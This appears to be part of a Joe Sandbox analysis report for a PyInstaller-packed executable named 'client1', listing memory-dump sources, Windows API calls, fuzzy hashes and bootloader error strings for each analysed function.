                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Unicode_$FromInternPlaceSizeString
                                                    • String ID:
                                                    • API String ID: 2745024575-0
                                                    • Opcode ID: 9280ec3cdcc7626997776a9e16dcb55bba6354dcabd47e52aff5645139c6f96c
                                                    • Instruction ID: d3403f8b0bf425239996109e2c451bc87dbef244298a3c8a0a6c4d815c4a1723
                                                    • Opcode Fuzzy Hash: 9280ec3cdcc7626997776a9e16dcb55bba6354dcabd47e52aff5645139c6f96c
                                                    • Instruction Fuzzy Hash: 26519CF5E0BA1281EE579FBAE99417877E4AF48BA0F04C13CCD7E42670DE2DA4648351

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                    • API String ID: 2030045667-3659356012
                                                    • Opcode ID: b9527ed25a08e027e619c0f48f7f69b51d33915f4b886b1c04b788e0506d998c
                                                    • Instruction ID: 5127a553522058f030d11232e604bcacd8dff4058a98ad03220e3a6ef4e4d023
                                                    • Opcode Fuzzy Hash: b9527ed25a08e027e619c0f48f7f69b51d33915f4b886b1c04b788e0506d998c
                                                    • Instruction Fuzzy Hash: 76416121B0D7C281EE34FB25E8402E9E3AAFB44794FD44431DE6D87A55EE3CE5418311

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00007FF79F623BA0: GetModuleFileNameW.KERNEL32(?,00007FF79F623699), ref: 00007FF79F623BD1
                                                    • SetDllDirectoryW.KERNEL32 ref: 00007FF79F6238A5
                                                      • Part of subcall function 00007FF79F626990: GetEnvironmentVariableW.KERNEL32(00007FF79F6236E7), ref: 00007FF79F6269CA
                                                      • Part of subcall function 00007FF79F626990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79F6269E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                    • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                    • API String ID: 2344891160-3602715111
                                                    • Opcode ID: a9d80687edf50720008c1c19d3c188cb07f31f297c6ec28e510237156a3f44f3
                                                    • Instruction ID: 9378a5468035c64dedb7c7cf3ca2fb4a3c8269c726e826f7cfe078daac12dbd0
                                                    • Opcode Fuzzy Hash: a9d80687edf50720008c1c19d3c188cb07f31f297c6ec28e510237156a3f44f3
                                                    • Instruction Fuzzy Hash: 57B1B121A1D7C351FE30BB319D522FDA25ABF44794FC04139EA6D87696EF2CE5048722

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                    • API String ID: 2030045667-1655038675
                                                    • Opcode ID: 3a29cac6c315e89fd1a339ce373b4b8305977fdf4dc839f12d0ce977f9400e5b
                                                    • Instruction ID: 2b31e093f5533dd89edb20ea74b162bd156f727efe36cfc882a4b9eebf5bb82e
                                                    • Opcode Fuzzy Hash: 3a29cac6c315e89fd1a339ce373b4b8305977fdf4dc839f12d0ce977f9400e5b
                                                    • Instruction Fuzzy Hash: DA51A022A0D7C285EA30BB61A8403FAA29AFB85794F844135EE6D87785EF3CE545C711

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 6f2067f9e2b798d7e4aa60285487f192dd8020c4dcad372bd04a148e1f9d7242
                                                    • Instruction ID: c801ba19517fe8c095bfee1e2afcf681606a9116e899a8ae86aa424cf4ace6f0
                                                    • Opcode Fuzzy Hash: 6f2067f9e2b798d7e4aa60285487f192dd8020c4dcad372bd04a148e1f9d7242
                                                    • Instruction Fuzzy Hash: 45C1C52290C7C691EA70BB35A4402FDE7AAEFC1B84F950135E96D03796CEBDE8458720

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 1452418845-0
                                                    • Opcode ID: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                    • Instruction ID: 7bfa76644cef631d3ae45f44de4443e65a40bd1892020e5672e118848bef1773
                                                    • Opcode Fuzzy Hash: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                    • Instruction Fuzzy Hash: 73311321E097C345FA74BB7499513FDA29BEF91384FC44034E92E8B2D7DE6CA8058272

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1279662727-0
                                                    • Opcode ID: 8a464286a4aee93ad09e46d96520f5fa22b2a313ca22bba1db5411dbdbef7e96
                                                    • Instruction ID: 3c025c4dba6c9d4953071937d259e383a1883ee57a742f34534be38f6efcc3b2
                                                    • Opcode Fuzzy Hash: 8a464286a4aee93ad09e46d96520f5fa22b2a313ca22bba1db5411dbdbef7e96
                                                    • Instruction Fuzzy Hash: 24419523D187C183FB64AF3195503B9E265FB957A4F609334E66C03AD6DFACA5E08710

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                    • Instruction ID: b1739a37f4992f6b746848c27ac7417057e0e1e55ffde008eb368e8f11f59d45
                                                    • Opcode Fuzzy Hash: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                    • Instruction Fuzzy Hash: D051EA61B193C245EA78AE3998006FAE19AAF44BB4F944734DD7D877CACF7CD4018722

                                                    Control-flow Graph

                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,00000000,00007FF79F63B79D), ref: 00007FF79F63B650
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF79F63B79D), ref: 00007FF79F63B65A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                    • Instruction ID: 5f155c4b525449dfabc16d6bc686e936b05c9d6be56a2bcf0d31afdc90bb181e
                                                    • Opcode Fuzzy Hash: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                    • Instruction Fuzzy Hash: 3011B262B18BD181DA20AB35B4441A9E766AB85BF4F944331EA7D477E9CF7CD0118700
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,?,00007FF79F639EA5,?,?,00000000,00007FF79F639F5A), ref: 00007FF79F63A096
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F639EA5,?,?,00000000,00007FF79F639F5A), ref: 00007FF79F63A0A0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CloseErrorHandleLast
                                                    • String ID:
                                                    • API String ID: 918212764-0
                                                    • Opcode ID: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                    • Instruction ID: 2210f0c6ec18eeecfef81bc4cfd7c9cdc769538a92b900b740c2422d0832fc66
                                                    • Opcode Fuzzy Hash: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                    • Instruction Fuzzy Hash: 4C21C211B0C7C341FA747770A4942F9969BAF447A8F844235D93E477C2CFAEA4459320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                    • Instruction ID: b5a193a13d7b48370e63cf277ad17c374611f16b92cad1aa5c5fcc9b271d7ff0
                                                    • Opcode Fuzzy Hash: 7edcb5c19051daea02f21c4053ec30bf8603933813fd22e9cae156a3527bc5bd
                                                    • Instruction Fuzzy Hash: 8841BB3291878147EA34EB35E5401B9F76AEBD5750F900131E6AD476D5CF7CE402CB61
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock
                                                    • String ID:
                                                    • API String ID: 840049012-0
                                                    • Opcode ID: 033a4210891c7de0e80cf35636e901d9f642a42152a779333d6082372dd68c1a
                                                    • Instruction ID: aaba48ed78273238833eb8c1e2c2563056a8dc6ee45a4c99caa644b75089b6cd
                                                    • Opcode Fuzzy Hash: 033a4210891c7de0e80cf35636e901d9f642a42152a779333d6082372dd68c1a
                                                    • Instruction Fuzzy Hash: 0A218521B193D145EA31BA3269447FAE65ABF45BD4FC84430EE2D87786CF7DE1418211
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                    • Instruction ID: 63730c47883fcca5f8c442cb7ac1d0d8529cbffe6236c03dfad8cc0605df32aa
                                                    • Opcode Fuzzy Hash: 36b0fbc90b3b462680d3b6a13c035726274d9c74de2b43bcb58660ea55cb43b3
                                                    • Instruction Fuzzy Hash: F0319222A187C145EB61BB3594013F8A66AEF40BA1F910135DA3D433D3CFFDA4419731
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                    • Instruction ID: 15fc347ae576280363d2ac980cfb010aeb15619487631d56c09895f8abcbe662
                                                    • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                    • Instruction Fuzzy Hash: D0118422A1C7C241EE74BF61A4012F9E2AAEF85B80FD54031EA5C57797DFBDD8108721
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                    • Instruction ID: 44a8cb5cefe810d6dade91abf6b13ea437ccdd4a3b9926db605ca3c2ca9ebe9c
                                                    • Opcode Fuzzy Hash: bc68aba4551d34184bb05bda2552568f64e358e9307c55527e30db01171bb599
                                                    • Instruction Fuzzy Hash: AA218732A18BC187DB71BF28E4403B9B7A6EB84B94F944235E66D476D9DF3DD8008B14
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                    • Instruction ID: 7d7071be6193a31a210b6f2e7c33f2c77c87ea4d077429a36c17e782bd0935d6
                                                    • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                    • Instruction Fuzzy Hash: 6D01A521B187C240EA24BB7699010E9E69EFB45FE0F888631DE7C57BD6CE7CD4019711
                                                    APIs
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF79F6230BE), ref: 00007FF79F6271D3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLibraryLoadMultiWide
                                                    • String ID:
                                                    • API String ID: 2592636585-0
                                                    • Opcode ID: 63080640ee8bd5a5197bc5957a639ee791a00d05320db4a40cef4a6e5ab977c0
                                                    • Instruction ID: db1b079971d0752154b27682a3aa2bfcf54e5b5dba51319fc6a3235899017180
                                                    • Opcode Fuzzy Hash: 63080640ee8bd5a5197bc5957a639ee791a00d05320db4a40cef4a6e5ab977c0
                                                    • Instruction Fuzzy Hash: 73E08612B1828542EE28BB77A9464EAE256AF48BC0B989035DE1D47755DD2DD4904A00
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,00000000,00007FF79F63A8B6,?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E), ref: 00007FF79F63DD95
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
                                                    • Instruction ID: 759ff3523cf500773aa47cd43d58c483f52b5daeafbc5732d7f1b4788e0dabf0
                                                    • Opcode Fuzzy Hash: 2e0f3e4b2c9ccc38d96cb592f5054ed38be707e8bf6a1ab6843b3be497aa41a7
